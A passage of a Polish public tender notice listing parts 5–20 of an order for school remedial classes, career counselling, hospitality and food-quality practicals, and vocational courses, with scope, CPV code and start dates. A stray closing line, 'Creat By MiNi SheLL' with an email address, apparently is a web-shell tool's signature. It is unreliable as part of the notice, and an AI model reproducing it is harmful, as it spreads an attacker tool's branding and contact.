<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze  z języka angielskiego   w technikum dla uczniów z klas III -  IV(4 x8os x 20 h)
- przygotowanie programu zajęć pozalekcyjnych (wyrównawczych) i ich prowadzenie,
- przeprowadzenie testu kompetencji w celu określenia poziomu komunikacji  się w języku angielskim i sporządzenie raportu z diagnozy
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia wyrównawcze  z matematyki   w II klasie technikum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze  z matematyki   w II klasie technikum (4 x 6-8 os x 40 h)
 - przygotowanie programu zajęć pozalekcyjnych (wyrównawczych) i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia wyrównawcze  z matematyki   w III - IV klasie technikum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze  z matematyki   w III - IV klasie technikum (4 x 8os. x 40 h)
-przygotowanie programu zajęć pozalekcyjnych (wyrównawczych) i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Warsztaty z pedagogiem  dla uczniów w technikum dla uczniów z klas II-IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty z pedagogiem  dla uczniów w technikum dla uczniów z klas II-IV(2gr x 7-8 os x 15 h) 
- przygotowanie programu zajęć pozalekcyjnych (wyrównawczych) i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia z poradnictwa edukacyjno -zawodowego (indywidualne) w  technikum dla uczniów z klas II-IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z poradnictwa edukacyjno -zawodowego (indywidualne) w  technikum dla uczniów z klas II-IV(3 h x 1ucz.)
- przygotowanie programu zajęć pozalekcyjnych i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy predyspozycji zawodowych uczniów na początku zajęć oraz opracowanie raportu i wniosków (max. 2 strony A4),
- stosowanie odpowiednich form i technik podczas rozmowy doradczej w pracy z uczniem oraz jego rodzicami.
- określanie czynników wewnętrznych oraz zewnętrznych w planowaniu kariery uczniów. 
-wyposażenie uczniów w niezbędne umiejętności do przeprowadzenia rozmowy rekrutacyjnej, pisania aplikacji CV i listu motywacyjnego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Przeprowadzanie oceny jakości żywności w technikum technologii żywności dla uczniów z klas IIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Przeprowadzanie oceny jakości żywności w technikum technologii żywności dla uczniów z klas IIA(1gr.x 12os x 30 h) 
- pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć,
- przygotowanie programu zajęć pozalekcyjnych - zawodowych i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Przeprowadzanie oceny jakości żywności w technikum technologii żywności dla uczniów z klas IIB, III i IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Przeprowadzanie oceny jakości żywności w technikum technologii żywności dla uczniów z klas IIB, III i IV(1gr.x 13os x 30h) 
- pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć,
- przygotowanie programu zajęć pozalekcyjnych - zawodowych i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Obsługa gości restauracyjnych i hotelowych w technikum hotelarstwa  dla uczniów z klas II-III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Obsługa gości restauracyjnych i hotelowych w technikum hotelarstwa  dla uczniów z klas II-III (1gr.x 10os x 30h)
- pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć,
- przygotowanie programu zajęć pozalekcyjnych - zawodowych i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Obsługa gości restauracyjnych i hotelowych w technikum hotelarstwa  dla uczniów z klas  III -  IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Obsługa gości restauracyjnych i hotelowych w technikum hotelarstwa  dla uczniów z klas  III -  IV(1gr.x 10os x 30h)
- pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć,
- przygotowanie programu zajęć pozalekcyjnych -zawodowych i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Przygotowanie podstawowych potraw i napojów w technikum organizacji usług gastronomicznych dla uczniów z klas III-IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia ćwiczeniowe kształcące wiadomości i umiejętności praktyczne: Przygotowanie podstawowych potraw i napojów w technikum organizacji usług gastronomicznych dla uczniów z klas III-IV(1gr.x 15 os x 30 h)
- pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć,
- przygotowanie programu zajęć pozalekcyjnych - zawodowych i ich prowadzenie,
- prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach oraz dokumentacji związanej z realizacją zajęć,
- dokonanie diagnozy umiejętności uczniów na początku zajęć i na końcu oraz opracowanie raportu i wniosków (max. 2 strony A4),
- sporządzanie raportu postępu uczniów w formie tabeli  (max. 2 strony A4),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Kurs kwalifikacyjny barmański..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kwalifikacyjny barmański. (2 grupy x 10os. x 36h)
- przygotowanie programu kursu z podziałem na zajęcia teoretyczne i praktyczne i jego prowadzenie,
- prowadzenie ewidencji osób w postaci list z podpisem obecności uczestnika na kursie oraz dokumentacji związanej z realizacją kursy,
- wydanie świadectwa na druku MEN lub innym dokumencie certyfikowanym,
- zapewnienie niezbędnych surowców spożywczych wszystkim uczestnikom projektu objętych wsparciem ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Kurs kwalifikacyjny kelnerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kwalifikacyjny kelnerski (2 grupy x 10 i 1gr.x 11os x  36 h)
- przygotowanie programu kursu i jego prowadzenie,
- prowadzenie ewidencji osób w postaci list z podpisem obecności uczestnika na kursie oraz dokumentacji związanej z realizacją kursy,
- wydanie świadectwa na druku MEN lub innym dokumencie certyfikowanym,
- zapewnienie niezbędnych surowców spożywczych wszystkim uczestnikom projektu objętych wsparciem,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Szkolenie carving.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie carving (3 grupy x 11os x  16 h)
- przygotowanie programu szkolenia  i jego prowadzenie,
- prowadzenie ewidencji osób w postaci list z podpisem obecności uczestnika na szkoleniu oraz dokumentacji związanej z realizacją szkolenia,
- wydanie świadectwa na druku MEN lub innym dokumencie certyfikowanym,
- zapewnienie niezbędnych surowców spożywczych i narzędzi wszystkim uczestnikom projektu objętych wsparciem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Kurs organizacji przyjęć  okolicznościowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs organizacji przyjęć  okolicznościowych (2grupy x 10 os x  30 h)
- przygotowanie programu kursu i jego prowadzenie,
- prowadzenie ewidencji osób w postaci list z podpisem obecności uczestnika na kursie oraz dokumentacji związanej z realizacją kursy,
- wydanie świadectwa na druku MEN lub innym dokumencie certyfikowanym,
- zapewnienie niezbędnych surowców spożywczych wszystkim uczestnikom projektu objętych wsparciem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Kurs kwalifikacyjny analityka zywności.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kwalifikacyjny analityka zywności (2grupy x 10 i 11os x  36 h)
- przygotowanie programu kursu i jego prowadzenie,
- prowadzenie ewidencji osób w postaci list z podpisem obecności uczestnika na kursie oraz dokumentacji związanej z realizacją kursy,
- wydanie świadectwa na druku MEN lub innym dokumencie certyfikowanym,
- zapewnienie niezbędnych surowców spożywczych wszystkim uczestnikom projektu objętych wsparciem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Szkolenie System zapewnienia jakości żywności HACCP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie System zapewnienia jakości żywności HACCP(1grupa x 10os x8 h)
- przygotowanie programu szkolenia i jego prowadzenie,
- prowadzenie ewidencji osób w postaci list z podpisem obecności uczestnika na szkoleniu  oraz dokumentacji związanej z realizacją szkolenia,
- wydanie świadectwa na druku MEN lub innym dokumencie certyfikowanym,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Szkolenie Gender mainstreaming.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie Gender mainstreaming(6 grup x 10 i 11os x  8 h)
- przygotowanie programu szkolenia i jego prowadzenie,
- prowadzenie ewidencji osób w postaci list z podpisem obecności uczestnika na szkoleniu  oraz dokumentacji związanej z realizacją szkolenia,
- wydanie zaświadczenia potwierdzającego udział w szkoleniu,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com